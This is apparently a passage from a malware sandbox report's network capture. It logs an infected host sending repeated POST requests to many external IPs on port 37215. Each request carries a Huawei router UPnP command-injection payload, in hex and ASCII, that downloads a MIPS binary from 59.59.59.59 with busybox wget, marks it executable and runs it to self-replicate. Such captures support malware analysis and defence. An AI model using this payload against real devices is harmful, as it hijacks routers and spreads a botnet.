2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2300192.168.2.1546510157.134.197.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:28.368880033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2301192.168.2.1533424157.156.158.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.182183027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2302192.168.2.153344041.64.109.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.182207108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2303192.168.2.155311892.150.40.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.182219028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2304192.168.2.155552041.183.252.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.182240009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2305192.168.2.154886641.12.54.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.182264090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2306192.168.2.1537716221.40.7.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.317094088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2307192.168.2.155950441.230.163.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.317131996 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2308192.168.2.1540192197.46.115.11837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.317157030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2309192.168.2.154140641.186.214.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.317190886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2310192.168.2.1546694157.131.73.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.317210913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
